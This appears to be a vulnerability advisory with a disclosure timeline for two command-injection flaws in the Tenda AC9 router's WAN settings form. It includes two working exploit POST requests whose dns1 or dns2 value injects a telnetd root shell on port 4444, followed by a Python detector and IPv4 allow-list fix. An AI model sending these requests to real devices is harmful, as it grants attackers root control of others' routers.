CVE-2019-5071 / CVE-2019-5072
An exploitable command injection vulnerability exists in the /goform/WanParameterSetting functionality of the Tenda AC9 Router AC1200 Smart Dual-Band Gigabit WiFi Router (AC9V1.0 Firmware V15.03.05.16_multi_TRU). A specially crafted HTTP POST request can cause a command injection, resulting in code execution. An attacker can send an HTTP POST request containing a shell command to trigger this vulnerability.
AC9V1.0 Firmware V15.03.05.16_multi_TRU
AC9V1.0 Firmware V15.03.05.14_EN
AC9 Router AC1200 Smart Dual-Band Gigabit WiFi Router
7.8 - CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
The Tenda AC9 is a popular, low-cost Smart Dual-Band Gigabit WiFi Router sold on many online shopping sites such as Amazon.
A command injection vulnerability exists in the /goform/WanParameterSetting resource. A local, authenticated attacker can embed arbitrary shell commands in the POST parameters of this resource and have them executed on the Tenda AC9 router. The injected command runs as root: the proof-of-concept requests below use it to start telnetd bound to TCP port 4444 with /bin/sh as the login program, which gives the attacker a root shell on the device.
CVE-2019-5071: the dns1 POST parameter of the /goform/WanParameterSetting resource is vulnerable to command injection. In the request below the dns1 value URL-decodes to ";telnetd -l/bin/sh -p4444;". The leading semicolon ends whatever command the handler builds around the parameter and the trailing one separates the payload from the remainder, so the shell runs telnetd regardless of what surrounds it.
The exploitable POST request is shown below:
POST /goform/WanParameterSetting?0.07019495213352056 HTTP/1.1
Host: 10.10.10.1
Content-Length: 193
Accept: */*
Origin: http://10.10.10.1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://10.10.10.1/main.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: password=4ea6455c8fe5c3303df84083935a69b5lnu23f
Connection: close

wanType=0&adslUser=&adslPwd=&vpnServer=&vpnUser=&vpnPwd=&vpnWanType=1&dnsAuto=0&staticIp=&mask=&gateway=&dns2=8.8.8.8&dns1=%3Btelnetd%20%2Dl%2Fbin%2Fsh%20%2Dp4444%3B&module=wan1
CVE-2019-5072: the dns2 POST parameter of the same /goform/WanParameterSetting resource is vulnerable to the same command injection. The request below is identical to the previous one except that the payload is carried in dns2 while dns1 holds a legitimate address, showing that each parameter is injectable independently.
The exploitable POST request is shown below:
POST /goform/WanParameterSetting?0.07019495213352056 HTTP/1.1
Host: 10.10.10.1
Content-Length: 193
Accept: */*
Origin: http://10.10.10.1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://10.10.10.1/main.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: password=4ea6455c8fe5c3303df84083935a69b5lnu23f
Connection: close

wanType=0&adslUser=&adslPwd=&vpnServer=&vpnUser=&vpnPwd=&vpnWanType=1&dnsAuto=0&staticIp=&mask=&gateway=&dns1=8.8.8.8&dns2=%3Btelnetd%20%2Dl%2Fbin%2Fsh%20%2Dp4444%3B&module=wan1
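The following is an added example, not code from the Talos advisory or from Tenda's firmware. It takes the two request bodies above, decodes them the way the router's form parser would, flags the parameter carrying shell metacharacters (a rule usable on captured traffic or web-server logs), and then applies the check a fixed handler should enforce before any of these values can reach a shell: a DNS-server field is only ever an IPv4 address, so everything else is rejected. The metacharacter pattern, the benign third body, and the assumption that staticIp, mask and gateway share the IPv4 format are mine; the advisory itself names only dns1 and dns2.

```python
"""Decode, detect and validate /goform/WanParameterSetting POST bodies.

Added example for CVE-2019-5071 / CVE-2019-5072; not the advisory's or
Tenda's code. Two checks are shown side by side:
  * find_injection()       - a deny-list detector for logs or a WAF
  * validate_wan_settings() - the allow-list check a fixed handler needs
"""
import ipaddress
import re
from urllib.parse import parse_qs

# Characters and sequences that carry meaning to /bin/sh.  Used for
# DETECTION only: the fix below is an allow-list, not this deny-list,
# because a deny-list that stopped at ';' would miss $(...), backticks,
# pipes and newlines.
SHELL_META = re.compile(r"[;&|`$<>\n\r]|\$\(")

# Parameters that must hold an IPv4 address.  The advisory names dns1
# and dns2; staticIp, mask and gateway are assumed (not stated on the
# page) to share the format.  Empty values are accepted because the
# captured request leaves staticIp/mask/gateway blank for wanType=0.
IPV4_PARAMS = ("dns1", "dns2", "staticIp", "mask", "gateway")


def decode_body(body: str) -> dict:
    """URL-decode an application/x-www-form-urlencoded body into a dict.

    keep_blank_values keeps fields such as adslUser= so the result
    mirrors exactly what the router's handler sees.
    """
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def find_injection(body: str) -> list:
    """Return (parameter, decoded value) pairs containing shell metacharacters."""
    return [(k, v) for k, v in decode_body(body).items() if SHELL_META.search(v)]


def is_ipv4(value: str) -> bool:
    """Strict allow-list check: the value is exactly one dotted-quad address."""
    try:
        ipaddress.IPv4Address(value)
    except ValueError:  # AddressValueError is a ValueError subclass
        return False
    return True


def validate_wan_settings(body: str) -> dict:
    """Validate every address field before the handler builds any command.

    Returns the decoded parameters on success; raises ValueError naming
    the first field that is not an IPv4 address.
    """
    params = decode_body(body)
    for name in IPV4_PARAMS:
        value = params.get(name, "")
        if value and not is_ipv4(value):
            raise ValueError(f"{name}: expected an IPv4 address, got {value!r}")
    return params


# The two bodies from the advisory (payload in dns1, then in dns2) plus a
# benign body constructed here for contrast.
PREFIX = ("wanType=0&adslUser=&adslPwd=&vpnServer=&vpnUser=&vpnPwd="
          "&vpnWanType=1&dnsAuto=0&staticIp=&mask=&gateway=")
PAYLOAD = "%3Btelnetd%20%2Dl%2Fbin%2Fsh%20%2Dp4444%3B"
BODY_DNS1 = PREFIX + "&dns2=8.8.8.8&dns1=" + PAYLOAD + "&module=wan1"
BODY_DNS2 = PREFIX + "&dns1=8.8.8.8&dns2=" + PAYLOAD + "&module=wan1"
BODY_BENIGN = PREFIX + "&dns1=8.8.8.8&dns2=1.1.1.1&module=wan1"


if __name__ == "__main__":
    for label, body in (("dns1", BODY_DNS1), ("dns2", BODY_DNS2), ("benign", BODY_BENIGN)):
        print(f"{label}: metacharacters in {find_injection(body) or 'no field'}")
        try:
            validate_wan_settings(body)
            print(f"{label}: accepted by the allow-list check")
        except ValueError as err:
            print(f"{label}: rejected -> {err}")
```

Running the block prints the decoded payload ";telnetd -l/bin/sh -p4444;" for the dns1 and dns2 bodies and shows both being rejected by validate_wan_settings, while the benign body passes. The design point is that the handler never needs to know which shell characters are dangerous: parsing the field as an IPv4 address leaves no room for a second command, whereas the detector's deny-list is only as good as its character set and belongs in monitoring, not in the fix.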
2019-07-29 - Initial contact
2019-08-07 - Sent plain text file
2019-10-02 - 60+ day follow up
2019-10-21 - 90 day follow up
2019-11-21 - Public Release
Discovered by Amit N. Raut of Cisco Talos.